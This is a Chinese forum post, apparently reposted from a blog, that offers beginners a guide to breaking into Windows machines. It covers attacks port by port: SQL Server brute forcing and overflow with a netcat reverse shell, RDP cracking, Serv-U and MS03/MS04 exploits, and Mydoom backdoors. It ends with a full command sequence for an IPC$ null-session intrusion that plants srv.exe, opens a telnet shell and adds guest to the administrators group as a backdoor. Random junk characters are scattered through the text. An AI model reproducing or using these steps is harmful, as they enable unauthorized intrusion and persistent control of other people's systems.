TA的每日心情 | 衰 2019-8-18 09:37 |
---|
签到天数: 2 天 [LV.1]初来乍到
|
来源:hi.baidu
" |* l$ e9 ]( @4 }# R- ] s( \6 T希望对新手入侵有帮助!
3 K8 y4 h7 y- x1 Z 1. 1433端口入侵
: R/ C' s( C* u% k3 S9 J# |0 G' } scanport.exe 查有1433的机器6 G8 M+ ^" j, s
SQLScanPass.exe 进行字典暴破(字典是关键): Z9 c+ l& U% T% Y- M5 S
最后 SQLTools.exe入侵对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。. k! i! l' a. A* R. f# P! a
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口
- }" j: P3 t6 Q' K (以上反向的,测试成功)& F A9 v* d0 i, d K: E
sqlhelloz.exe 入侵ip 1433 (这个是正向连接)
4 K( l8 z" {$ R. ^0 V 2. 4899端口入侵
5 o+ O' n0 S+ L7 x 用4899过滤器.exe,扫描空口令的机器 Q4 d8 _( b5 K5 s/ w9 k
3. 3899的入侵: z! x* ^. ~/ @ O
对很早的机器,可以试试3389的溢出(win3389ex.exe)% w B( a8 Q, F& Z' y- Z4 k& j( h( e
对2000的机器,可以试试字典暴破。(tscrack.exe)6 j' F( O3 m/ L( V E
4. 80入侵
% H( o0 z/ }) L# j* |) a 对sp3以前的机器,可以用webdav入侵;2 d2 p# _7 S1 \# Q$ b
对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)" D$ p% |" I- |" W/ I
可以利用SQL进行注入。(啊D的注入软件)。
4 O6 k$ ]' o4 c) z 5. serv-u入侵(21端口)
; m9 J& P. Q! Z& K+ L 对5. 004及以下系统,可用溢出入侵。(serv5004.exe)3 R1 h" \7 u* T5 q# ]+ P9 A: G
对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)5 ~' K- a% I5 ?! q# [' @
对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)
( w* f; i" W" A5 e& o; E" T2 X! X) b' q 输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码
- E5 X# C/ L7 m6 {$ a! Q 6. 554端口" k" Q0 ?5 d3 l5 E6 w
用real554.exe入侵。
$ B# ~& \4 V5 U( q; | 7. 6129端口
; u/ D `; ~2 [, i5 ~0 ` 用DameWare6129.exe入侵。
( k* d. |: H9 i2 x. K/ ?0 J2 C3 {3 ~ 8. 系统漏洞. l7 z+ U& D! s0 x" B
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,进行溢出入侵。* w: ^) H$ }$ N% w& \
9. 3127等端口
7 X: {6 }: p' R8 [/ ^7 e, G
/ _4 y( K: m$ F( {1 }! Z- I6 ~' ] 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。
; ^* u6 S- g: l2 H- m 10. 其他入侵
- b0 |4 U1 P1 B3 s 利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。2 n! s# w! ^7 F
( s0 z; t* J( L. Y! z+ T0 {2 K 经典IPC$入侵
4 q& t, C5 u$ G% A0 }% H; W9 ~( N2 \, z1 ]. Q' \
1. C:\>net use $">\\127.0.0.1\IPC$ "" /user:"admintitrators"1 l$ c% h# X9 W; V" z
这是用"流光"扫到的用户名是administrators,密码为"空"的IP地址(气好到家如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。
. ^4 `* C. v! t4 _& Q 2. C:\>copy srv.exe $">\\127.0.0.1\admin$ i2 \' C' Q; m8 A
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。/ E3 B8 S0 B9 V7 ?! H$ L7 e
3. C:\>net time file://127.0.0.1/
* |% r( i7 {1 h" Y8 Y/ f 查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。
0 m, \. |$ g }( M5 Z/ { 4. C:\>at file://127.0.0.1/ 11:05 srv.exe
* P1 Z1 c7 R1 k/ p 用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊.
( V% L: L7 r8 e" j* [+ \, l 5. C:\>net time file://127.0.0.1/
4 O: ?* N1 T) z 再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。$ j* ?1 l k' X- h5 a1 m) W* _: c) z
6. C:\>telnet 127.0.0.1 997 X; v3 D+ v# K) w/ W+ m
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
3 a- Y+ R8 ~6 r* ]$ s7 t+ h& { 虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了! g# r2 |5 D9 L5 C( ~% ^* u
7.C:\>copy ntlm.exe $">\\127.0.0.1\admin$- k9 m* y) y6 r) T! a- G
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
. @' {/ N. f1 y) P 8. C:\WINNT\system32>ntlm' Z6 x. f) e3 ^% {! Z& J; f* I
输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!) {& }0 J$ K6 [0 d2 i4 e
9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)为了以防万一,我们再把guest激活加到管理组
! K) q7 L$ X% E" G/ O; ^& j' A 10. C:\>net user guest /active:yes
4 w+ y5 P2 ?; `0 D( }( |4 ? 将对方的Guest用户激活2 S4 x3 S, z2 R, { H c
11. C:\>net user guest 1234
" C* ?9 e, M$ O4 M1 t 将Guest的密码改为1234,或者你要设定的密码
+ \/ ~% r' c: g' ` 12. C:\>net localgroup administrators guest /add
, y& z* [; Y, p 将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机) |
|